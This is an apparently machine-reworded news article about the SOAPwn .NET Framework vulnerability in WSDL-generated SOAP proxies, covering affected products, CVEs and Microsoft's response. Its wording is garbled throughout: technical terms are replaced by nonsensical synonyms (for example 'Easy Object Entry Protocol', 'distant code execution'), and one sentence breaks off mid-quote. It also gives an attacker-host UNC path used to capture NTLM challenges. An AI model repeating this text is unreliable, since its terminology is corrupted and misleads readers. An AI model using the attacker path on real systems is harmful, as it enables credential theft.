New analysis has uncovered exploitation primitives within the .NET Framework that might be leveraged towards enterprise-grade purposes to attain distant code execution.
WatchTowr Labs, which has codenamed the “invalid solid vulnerability” SOAPwn, mentioned the difficulty impacts Barracuda Service Heart RMM, Ivanti Endpoint Supervisor (EPM), and Umbraco 8. However the variety of affected distributors is prone to be longer given the widespread use of .NET.
The findings have been introduced at the moment by watchTowr safety researcher Piotr Bazydlo on the Black Hat Europe safety convention, which is being held in London.
SOAPwn primarily permits attackers to abuse Internet Providers Description Language (WSDL) imports and HTTP shopper proxies to execute arbitrary code in merchandise constructed on the foundations of .NET attributable to errors in the way in which they deal with Easy Object Entry Protocol (SOAP) messages.
“It’s often abusable via SOAP purchasers, particularly if they’re dynamically created from the attacker-controlled WSDL,” Bazydlo mentioned.
In consequence, .NET Framework HTTP shopper proxies could be manipulated into utilizing file system handlers and obtain arbitrary file write by passing as URL one thing like “file://
In a hypothetical assault situation, a risk actor may leverage this habits to provide a Common Naming Conference (UNC) path (e.g., “file://attacker.server/poc/poc”) and trigger the SOAP request to be written to an SMB share beneath their management. This, in flip, can enable an attacker to seize the NTLM problem and crack it.
That is not all. The analysis additionally discovered {that a} extra highly effective exploitation vector could be weaponized in purposes that generate HTTP shopper proxies from WSDL information utilizing the ServiceDescriptionImporter class by profiting from the truth that it doesn’t validate the URL utilized by the generated HTTP shopper proxy.
On this method, an attacker can present a URL that factors to a WSDL file they management to susceptible purposes, and procure distant code execution by dropping a completely practical ASPX net shell or further payloads like CSHTML net shells or PowerShell scripts.
Following accountable disclosure in March 2024 and July 2025, Microsoft has opted to not repair the vulnerability, stating the difficulty stems from both an software challenge or habits, and that “customers shouldn’t devour untrusted enter that may generate and run code.”
The findings illustrate how anticipated habits in a well-liked framework can develop into a possible exploit path that results in NTLM relaying or arbitrary file writes. The problem has since been addressed in Barracuda Service Heart RMM model 2025.1.1 (CVE-2025-34392, CVSS rating: 9.8) and Ivanti EPM model 2024 SU4 SR1 (CVE-2025-13659, CVSS rating: 8.8). The vulnerability in Umbraco 8 persists because it reached end-of-life (EoL) on February 24, 2025.
“It’s attainable to make SOAP proxies write SOAP requests into information relatively than sending them over HTTP,” Bazydlo mentioned. “In lots of circumstances, this results in distant code execution via webshell uploads or PowerShell script uploads. The precise affect will depend on the appliance utilizing the proxy courses.”
